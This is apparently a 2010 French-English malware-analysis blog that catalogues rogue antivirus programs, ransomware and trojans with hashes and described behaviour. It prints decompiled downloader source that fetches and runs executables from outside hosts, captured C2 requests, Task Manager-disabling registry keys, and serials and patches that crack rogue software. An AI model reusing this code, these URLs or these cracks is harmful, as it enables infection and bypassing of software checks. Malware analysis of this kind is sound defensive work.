Bienvenue sur Xylibox, projet qui a pour but d'analyser tous type de malware
Vous pouvez signaler un abus grâce au formulaire adéquat et voir la liste des sites potentiellement dangereux signalés par d'autres utilisateurs.
Cliqué sur une notification, pour développer celle-ci.
Contact:
/Xylitol
[Stay secure] Prevent malware
Faites lui confiance !
Télécharger un anti-virus
Links
Les solutions suivantes sont gratuit pour un usage personnel
[Xylibox] Malware notification 2010/06/22 - Security Central (Rogue)
Localisation: http://my-security-central.com/
Original Name: Unknown
File Type : Exe, Size : 942080 (0E6000h) Byte(s)
Packer: Unknown
EP: 000010B0
EP Offset: 000010B0
EP Section: .text
Linker: 6.0
SHA1: 8567C73FA5E704295176F7B26829878C20435140
Info additionnel: Security Central is a fake Antivirus tool. It is from the same rogue family as Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009.
If your PC is infected with this, run MBAM to remove the infection.
Once registered, Security Central doesn't detect infections anymore (same system, no cleanings).
There is no more fake alerts and disturbing warning messages...
Easy proof of a scareware application.
If your PC is infected with Security Central, use MBAM to remove the infection.
Info additionnel: When executed, it is making a copy of itself in /%ALLUSERSPROFILE%/Media/ with the name "movies.exe" a batch file called "rdb.bat" are also here.
The ransomware displays an invasive message box in Russian, and block some applications like taskmgr, regedit etc...
If your PC is infected with this, run MBAM to remove the infection.
First serial to enter: 62907349
Second serial: 49752406
Info additionnel: XP Antivirus 2008 is a fake security software (rogue).
It displays fake alerts to justify an infection to incite users into buying a license.
From the same family of Desktop Security 2010, i mean same key check.
If your PC is infected with XP Antivirus 2008, run MBAM to remove the infection.
Patching way:
1) Make a breakpoint on 0043E907
2) Enter any serial
3) Change the value 00 on DS:[01365d20] by 01
4) Enjoy
Un petit merci a Siri pour le chan irc, vous faite du super boulot avec vos bots a malware, keep up :]
Original Name: Unknown
File Type : Exe, Size : 68608 (010C00h) Byte(s)
Packer: Unknown
EP: 00001066
EP Offset: 00000466
EP Section: .text
Linker: 8.0
SHA1: 293c853735e3df483453e4659d70ca955674c4ba
Info additionnel: When executed, it is making a copy of itself in /%ALLUSERSPROFILE%/Media/ with the name "movies.exe" a batch file called "rdb.bat" are also here.
The ransomware displays an invasive message box in Russian, and block some applications like taskmgr, regedit etc...
If your PC is infected with this, run MBAM to remove the infection.
First serial to enter: 28527548
Second serial: 35676549
Info additionnel: Antivirus-1 is a rogue from february 2009 (fake security software).
It belongs to the same family as Total Virus Protection, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus
If your PC is infected with Anti-Virus Number-1, use MBAM to remove the infection.
Email: phoenixbytes@live.fr
Serial: 873465112334272 or 78629310938
[Xylibox] Malware notification 2010/06/19 - XP Antivirus (Rogue, cracking session)
Info additionnel: XP Antivirus is a fake security software (rogue).
It displays fake alerts to justify an infection to incite users into buying a license.
If your PC is infected with XP Antivirus, use MBAM to remove the infection.
The serial check was done on the server and the server was dead so there is no key.
We cant register this rogue
so patch it:
00497FFA . /0F85 29020000 JNZ 00498229 -> NOP this line !
then you have done the work.
Also another good news: This is a stupid rogue
The rogue juste check if there is an registry entry about the registration, he doesn't care if the serial is good or bad :)
so, regfile the shit:
Info additionnel: Green AV is another fake security software (rogue).
Green AV is a fake security software (rogue).
It displays fake alerts to justify an infection to incite users into buying a license.
It belongs to the same: AntivirusBEST, Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus
If your PC is infected with Green AV, use MBAM to remove the infection.
Info additionnel: AntivirusPlus is another fake security software (rogue).
This scareware is not new, but it was not very active.
Recently, more fake online scanners advertise Antivirus Plus for removal tool.
If the rogue detects a lot of infections (all inexistent), once registered, it propose to remove them.
If we don't accept (ALT-F4 to quit) they have all disappeared on next execution.
Email: phoenixbytes@live.fr
Serial: 9827569362578384 or 8748349485784030
If your PC is infected with Antivirus Plus use MBAM to remove the infection.
Info additionnel: Antivirus 2009 rogue replace the original SP2 Security Center by its own.
It was from the Anti200X family: Live Security Suite, Live Entreprise Suite, Personal Security, Cyber Security, AntivirusBest, Total Security, Total Virus Protection, Anti-Virus Number-1, Antivirus 360, Antivirus Sentry, Internet Antivirus Pro, PC Protection Center 2008, Antivirus 2010, eAntivirusPro, AntiMalware 2009, Micro Antivirus 2009, XPert Antivirus, Power Antivirus, Advanced Antivirus, MS Antivirus
Email: phoenixbytes@live.fr
Serial: 0429682-95N-LKSJDLKJ53Y09
If your PC is infected with Security Master AV use MBAM or SmitfraudFix to remove the infection.
Info additionnel: Security Master AV is a fake Antivirus from may. This rogue drops files on the system and detects them as infected to scare users; files are filled with junk data and do not represent a risk. It was on the same family of: My Security Engine, Security Guard, CleanUp Antivirus and Security Antivirus
Serial: UEPB-H4KA-S2LA-U2FD
This rogue was damn hard to crack.
Security Master AV comes from fake online scanners and porn sites
If your PC is infected with Security Master AV use MBAM to remove the infection.
Info additionnel: Antivirus Best is a fake security software (rogue). It displays fake alerts to justify an infection to incite users into buying a license.
It belongs to the same: Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus
Email: phoenixbytes@live.fr
Serial: 873465112334272 or 78629310938
If your PC is infected with AntivirusBEST, use MBAM to remove the infection.
EP Section: .text
Text strings referenced in soft:.text, item 534
Info additionnel: Address=00431AA4
Disassembly=PUSH 004846D8
Text string=ASCII "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support."
Navigate to: "http://lab.l4ever.cn/ip/Api/"
Navigate to: "http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe"
(Chinese AV)
Decompiled Source code:
#NoTrayIcon
FileInstall("1.exe", @TempDir & "\" & @ScriptName)
$TXT = ""
For $T = 1 To 10
$USERN1 = ""
For $U = 1 To 6
$USERN1 = $USERN1 & Chr(Random(97, 122, 1))
Next
$USERN2 = ""
For $U = 1 To 4
$USERN2 = $USERN2 & Random(0, 9, 1)
Next
$USERN3 = ""
For $U = 1 To Random(1, 3, 1)
$USERN3 = $USERN3 & Chr(Random(65, 90, 1))
Next
$TXT = $TXT & $USERN1 & $USERN2 & $USERN3 & @CRLF
Next
FileWrite(@TempDir & "\" & @ScriptName, $TXT)
RunWait(@TempDir & "\" & @ScriptName)
FileDelete(@TempDir & "\" & @ScriptName)
$A06E0C0522A = 0
FileDelete(@TempDir & "\900210122.idx")
$A1AE0E02A5C = InetGet("http://lab.l4ever.cn/ip/Api/", @TempDir & "\900210122.idx", 1, 0)
If @error Then
$A06E0C0522A = 1
Else
$A11E0F04E51 = FileReadLine(@TempDir & "\900210122.idx", 1)
;### Tidy Error: If/ElseIf statement without a then..
If StringInStr($A11E0F04E51, "
Nwm") OR STRINGINSTR($A11E0F04E51, " _lς") THEN
$A06E0C0522A = 1
Else
EndIf
FileDelete(@TempDir & "\900210122.idx")
EndIf
If $A06E0C0522A = 0 Then
FileInstall("forqd125.exe", @AppDataCommonDir & "\forqd125.exe")
RunWait(@AppDataCommonDir & "\forqd125.exe")
$OPENWEB = "http://121.10.107.50/11.html?kaishi"
Run(@ComSpec & " /c " & "start " & $OPENWEB, "", @SW_HIDE)
Local $A23F000291E = InetGet("http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe", @AppDataCommonDir & "\DUBA2011_down_31_18466.exe", 1, 1)
Do
Sleep(250)
Until INETGETINFO($A23F000291E, 2)
Local $A30F010363F = INETGETINFO($A23F000291E, 0)
INETCLOSE($A23F000291E)
Run(@AppDataCommonDir & "\DUBA2011_down_31_18466.exe")
WinWaitActive("Ñ'q\Òk8—2
Name: 1.exe
File Type : Exe, Size : 163840 (028000h) Byte(s)
Packer: Unknown
EP: 00004772
EP Offset: 00004772
EP Section: .text
Linker: 6.0
Info additionnel: Downloader/Loader
SHA1: 7c3260f22f5b69b8e18308c8bc91a3e448b4f43a
Navigue to: http://www.my8899.com/ - http://www.2345.com/tg10.htm - http://www.2345.com/css/sd_1.css
The following directories were created:
/%ProgramFiles%/SogouInput
/%ProgramFiles%/SogouInput/5.0.0.3787
/%ProgramFiles%/Winrar
4 files was created in /%ProgramFiles%/SogouInput/5.0.0.3787 (all file ares same)
cgi-bin.knl:
StockP.knl:
(Firstly located in /%temp%/ with the name "winrar.knl")
Wrapper.knl:
Obfuscated.knl
(This file was deleted after)
Additional info: Anti debug, 0x4006FA, nop the shit. Create registry key: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main - DEPOff:1
Create 0041.DLL in /system32/
Modify many registry values about 0041.DLL
Create a file WORK.DAT on the same folder (/system32/)
Open RegSvr32.exe and register 0041.DLL silently, the dll uncrypt "WINLOGON, IEXPLORE, FIREFOX"
and after i've got some problem for continue to debug it...
Additional info: Create a lot of news registry keys, news files appears:
/%TEMP%/_check32.bat
/%System%/aspimgr.exe
_check32.bat:
:Repeat
del "C:\Documents and Settings\Administrateur\Bureau\spb.exe"
if exist "C:\Documents and Settings\Administrateur\Bureau\spb.exe" goto Repeat
aspimgr.exe
Service created: aspimgr "Microsoft ASPI Manager": C:\WINDOWS\system32\aspimgr.exe
Additional info: Trojan, create/read some registry keys, register a drivers, add the file to the startup list.
you can see some interesting stuff at: 0040144A
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations:
\??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.tmp
Info additionnel: Change le desktop, autorise seulement quelques processus à s'exécuter, trouve de fausse infections, créé des entrés registres pour démarrer au démarrage.
Key for register the rogue:
WNDS-S0DF5-GS5E0-FG14S-2DF8G
File Type : Exe, Size : 1523712 (0174000h) Byte(s)
Packer: Unknown
EP: 00007ECF
EP Offset: 000072CF
EP Section: .code
Linker: 7.0
SHA1: ad620469683947401d56d4c56e4eb44a1e6aed10
Info additionnel: Auto Copy in "/%Program Files%\Securityessentials2010" (SE2010.exe)
Security essentials 2010 displays a lot of warning messages, change the desktop background, detects fake infections and blocks softwares execution. It comes from fake online scanners, malicious porn sites, fake cracks and exploits.
Voici un regfile que j'ai fais pour enregistré le rogue:
Info additionnel: (Désactive le Drag'n'Drop*, suprime des clé registres* (* = secondaire) Bloque l'accès à l'horloge, Créé un exécutable dans /%temp%/ (wscsvc32.exe) et l'exécute, se copie dans /%temp%/ et s'auto delete (pas la copie) un icône apparais dans le systray et fais apparaitre de temps en temps des infobulles pour vous signalez que vous êtes infecté, une fois cliqué sur l'infobulle, "Protection Center" commence à s'installer.
FileName: wscsvc32.exe
File Type : Exe, Size : 217600 (035200h) Byte(s)
Packer: Unknown
EP: 00001005
EP Offset: 00000405
EP Section: .text
Linker: 9.0
SHA1: 841886825521f6bc5819d6ac8758cbc2c810a6c4
Info additionnel: Faux Centre de sécurité Windows qui renvoie sur Protection Center pour vous faire acheté une license.
Créé une entré registre pour désactivé taskmanager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
DisableTaskMgr =dword:00000001
FileName: cntprot.exe
File Type : Exe, Size : 1672192 (0198400h) Byte(s)
Packer: Unknown
EP: 00001005
EP Offset: 00000405
EP Section: .text
Linker: 9.0
SHA1: 3a0847129d749f52fa40cafe32477ba926fdf6d1
Info additionnel: Rogue, ajoute des objets sur le bureau, trouve des malwares qui n'existe pas dans le but d'effrayer l'utilisateur, programme un reboot au bout de x temps (Compte à rebours de 30 secondes)
3 Raccourcis pour accéder à des sites pornographiques:
nudetube.com
pornotube.com
youporn.com
3 Application qui ne font rien:
spam001.exe
spam003.exe
troj000.exe
Voici un regfile que j'ai fais pour enregistré le rogue:
après être enregistré il delete les fichiers qu'il a créés mais... utiliser MBAM reste la meilleure chose à faire.
Mes captures d'écran sont assez éloquentes.
license.txt:
Thanks for purchasing antivirus software. Your antivirus software is activated successfully.
Your registration key is:
94804860143697233939975370329435970097710202
(PLEASE, SAVE IT SEPARATELY IN CASE YOU NEED TO REBOOT OR REINSTALL ANTIVIRUS SOFTWARE)
The last version of antivirus:
http://edscorpor.com/customers/installer.php?pid=PROTCNT_BASIC
You can also find this link in your software HELP & SUPPORT part. Please, use this link in case of reinstallation.
If you have any question, please, pay attention to tickets, Help&Support. You can find out the answer on your question there.
For urgent cases, please, contact us on the phone
1-866 427 1693.
Thank you!
File Type : Exe, Size : 1431552 (015D800h) Byte(s)
Packer: Unknown
EP: 00001000
EP Offset: 00000400
EP Section: .text
Linker: 7.10
Info additionnel: Créé des .exe et des .dll dans /system32/ et /driver/ une DLL: HTMLayout.dll et créé dans le dossier temporaire, affiche du faux spam et du faux DDoS pour faire peur a l'utilisateur, navigation bloqué pour quelques sites, bloque l'accès à taskmanager et à regedit
Principe: Désative NOD32 (erkn.exe, egui.exe) et fait d'autres actions avec notepad.exe et cmd.exe, le tous en ShowState = SW_HIDE
Créé une DLL (tete13015250t.dll), l'exécute avec rundll32.exe
La dll désactive quelques anti-virus, et ensuite la dll et suprimé
L'application créé un driver (pcidump.sys) l'enregistre (ADVAPI32.OpenSCManagerA) /démmarre le service/suprime le driver.
D'autre aplications sont généré comme "TraversinIE.exe"
Qui vons navigué sur des sites, essayé d'attaqué avec un fichier .dat téléchargé
(et enregistré dans /system32/AttackSet.dat)
le fichier .dat contient une liste de site et d'IP
A la fin, p.exe créé un .bat dans le même dossier que ou il se trouve (afc90a.bat)
contenu:
@echo off
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@echo ad32rwhlk>>321.aqq
@del 321.aqq
@del "C:\Documents and Settings\Administrateur\Bureau\dumped.exe"
@del afc90a.bat
@exit
et a la fin:
004030E6 . 6A 00 PUSH 0 ; /ExitCode = 0
004030E8 . FF15 64104000 CALL DWORD PTR DS:[<&KERNEL32.E>; \ExitProcess
processus qui tourne en fond:
TraversinIE.exe (plusieure copie même)
0504_1[1].exe
13[1].exe
extext7995062t.exe
Info additionnel: trojan, create a .sys file, use the Service Control Manager for register it, start the service, open cmd and auto destroy the file agressive.exe
http://picturegraffitoarts.com/perce/d24c31dea91a89c7271f0b38a9f16e7cafc8f49456f159402e7da20ae72db6c760fdaf1a0b23e32d3/f465e2f7d95/qwerce.gif
Note: data are changing everytime you open the exe.
rundll32.exe:
http://cuert.com/oms.php
POST /oms.php HTTP/1.0
Host: cuert.com
User-Agent: XML
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
data=hv7ROK5vhoufT3ysRPtwhSdCPiNb1+ERI3HxgCf1AKQmBpHjUtsTW9XhkpL+0Jnplbyi6nsRfpCeQNe5SY1MWNROxBqZWIbwZFfGpPZRgQZXMdOnVnnp7vE2mg==
Ysl.exe:
http://livingtraffic.com/borders.php (Navigate to a random Ad)
POST /borders.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: livingtraffic.com
Content-Length: 397
Connection: Keep-Alive
Cache-Control: no-cache
data=/CjEfcGBu0aC2aRzshY15Se2ybtC5dpImg/w+Tex1QY4wJ5rq8UzvceeHLjiBkG/g+7VCC/0pBqxOHp7eRcHPiYo99QMUujgUW4boDIVJrfNWKSLnrd6100X8mVNwwq4vOQxSHXwpz9Hm0kz9fBfaUn10x/GLcofRiH4LvFsAiGYFsaioMW07K0E3rkk3MeZUygDeLGw2s12+oPMNrnJZczhzZ8xiNWu5TgOhq4OqUS0BMTdK2bZy/hj22fYPROJBldybEq/4kfeYEcl/ciRQeLEgdooChJv/oVzPhBsvCkqww83oFaArnsLuMFzziWRoD1780koO+1moE1TtNIfizqep68zCkdvTeZIElQ4H99xQXKEQX4bhp4bhaKbKGEJkbdfBT72
S'adressant plus particulièrement aux étudiants en informatique, le jeu « Crack Me » est un concours dont l'objectif est d'analyser le code source du programme « ESET_crack-me.exe », afin de trouver 3 messages cachés. Ce concours est à l'origine un test d'entrée soumis aux candidats qui postulent pour le poste de développeur chez l'éditeur d'antivirus ESET.
Le défi à relever ? Soyez le plus rapide à analyser le code, trouver les failles et le premier à dévoiler les messages cachés !!! Réussissez à déjouer les pièges, décodez l'ultime message et tentez de gagner un voyage à Bratislava en Slovaquie pour découvrir les secrets bien gardés du célèbre laboratoire ESET où est développé l'antivirus NOD32.
Nombreux lots a gagner: Opportunités de Stages et Jobs á la clé chez ESET !
Concours 100% GAGNANT : 3 mois de protection antivirus offerts à tous les participants
Séjour à Bratislava et visite en exclusivité du labo ESET*
Partez à la découverte du laboratoire de recherche anti-malwares du célèbre éditeur antivirus ESET basé en Slovaquie.
Vous êtes à la recherche d'un job étudiant ? Participez au concours crackme et recevez nos offres par e-mail.
Info additionnel: When runned, make 2 files in: "C:\ProgramFiles" and run the files
» Facebook Hacking By ImadowS.exe
- Original Name: Faceboax.exe
- Packed: X-treme Protector v1.07
- EP: 0007E21E
- EP offset: 0007C61E
- Linker: 8.0
- EP Section: .text
- File Type : File Type : Exe, Size : 868352 (0D4000h) Byte(s)
» server.exe
- Original Name: Unknown
- Packed: X-treme Protector v1.07
- EP: 0000A014
- EP offset: 00008614
- Linker: 6.0
- EP Section: WinLicen
- File Type : Exe, Size : 990589 (0F1D7Dh) Byte(s)
SHA1 (Facebook Hacking By ImadowS.exe): 34291c134e31b1e10f4c819eba3b03838bee64d3
[News] 2010/05/17 - Une menace virtuelle peut-elle ruiner votre existence réelle ?
Même si l'histoire ne date pas d'aujourd'hui, c'est toujours bon de relayé l'information car ce phénomène reste d'actualité, et c'est aussi pour redonner un peu de dignité à un homme qui n'a rien demandé à personne.
ETATS-UNIS - Une enquête révèle que des innocents propriétaires d'ordinateurs infectés pourraient être accusés à tort
«C'est pas moi, c'est un virus.» L'excuse serait couramment employée par les pédophiles pour justifier la présence sur leur disque dur d'images pédopornographiques. Une enquête de l'agence Associated Press révèle cependant que dans un cas au moins, c'est la vérité.
Michael Fiola en compagnie de son épouse Robin
le cas de Michael Fiola, renvoyé en 2007 par son employeur, qui avait retrouvé sur son ordinateur des fichiers de pédopornographie.
Accusé de pédophilie, Michael Fiola risquait 5 ans de prison dans le Massachusetts. Les pneus de sa voiture ont été crevés, il perdu tous ses amis et lui-même a été menacé de mort, mais il a décidé de se défendre.
Heureusement son épouse s'est tenue prêt de lui,
ses avocats ont fait procéder à des expertises qui ont révélé que son ordinateur était infecté.
«Ca a ruiné ma vie, la vie de ma femme et la vie de ma famille»
Un virus était programmé pour visiter une quarantaine de sites pédopornographiques par minute.
De nouveaux tests, réalisés par le procureur, ont confirmé les conclusions de la défense et les charges pesant contre Michael Fiola ont été abandonnées.
L'affaire a coûté 250.000 dollars (plus de 165.000 euros) à Michael Fiola qui a dû hypothéquer sa maison et vendre sa voiture.
«Ca a ruiné ma vie, la vie de ma femme et la vie de ma famille», déclare-t-il aujourd'hui.
Merci a ¥ω₪h (MAD).
[XyliBox] Xylibox Malware Challenge 1# - Get XyliBoxed! [Updated]
Xylibox Malware Challenge 1#:
Difficulty: 2 - Needs a little brain (or luck)
Platform: Windows XP
Language: VB6 (Voluntarily coded in this language)
Rules: - Make a tutorial*
- Code a tool for disinfect your computer (With source)
I hope to see some innovative solutions!
Good luck & Have fun!
Mail: phoenixbytes@live.fr (For Solution Submission)
After first solutions, I will release the virus source code and your solutions.
=============================================================
*The main goal of this challenge is to give newbies a way to learn, so they need correct tutorial.
Think about this words when writing your tutor.
Explain what you did.
And this is not done by writing two lines and commenting some code parts.
Think about the informations you needed the first time when you were new to reversing..
Archive password: b0x
[News] 2010/04/27 - Stealers: You Click, You Lose.
Stealers:
Les PassWord Stealer sont, comme le nom l'indique, des outils destinés à voler les mots de passe.
Ils font partie d'un vaste ensemble d'outils et de techniques d'attaque des mots de passe.
Ce sont de petits programmes d'espionnage, spécialiés, constituant une sous-famille des spywares.
Ils construisent un journal de tous les mots de passe trouvés sur une machine et les mettent à disposition d'une personne ayant physiquement accès à l'ordinateur attaqué ou les envoient, généralement par un e-mail caché, au voleur.
Une petite analyse pour que vous puissiez voir un aperçu du travail :)
L'archive va surement être bloqué par votre Anti-Virus à cause du malware que il y a dedans.
Pour une raison de sécurité évidente j'ai mis le malware dans un fichier .zip protégé par un mot de passe.
Le mot de passe et dans la description de l'archive. Téléchargé
Original Name: ¬¬¬¬¬¬lijkjkjDFFNFGDFFFFFHLULZ¬¬¬¬¬¬¬.exe
File Type : Exe, Size : 340078 (05306Eh) Byte(s)
Packer: Unknown
EP: 000012F8
EP Offset: 000012F8
EP Section: .text
Linker: 6.0
Info additionnel: Trojan Horse.
The file is incl with "AssualtCube hack.dll" the dll is clean, it's a dll for a program called "Black skillz Public" a Warrock hack...
about AssualtCube hack.exe
he make a file in "C:\Documents and Settings\Administrateur\Application Data"
file with a VB icon called "winregsec.exe" this file was also launched by AssualtCube hack.exe
Solution: Kill the process and destroy the file "winregsec.exe" and "AssualtCube hack.exe"
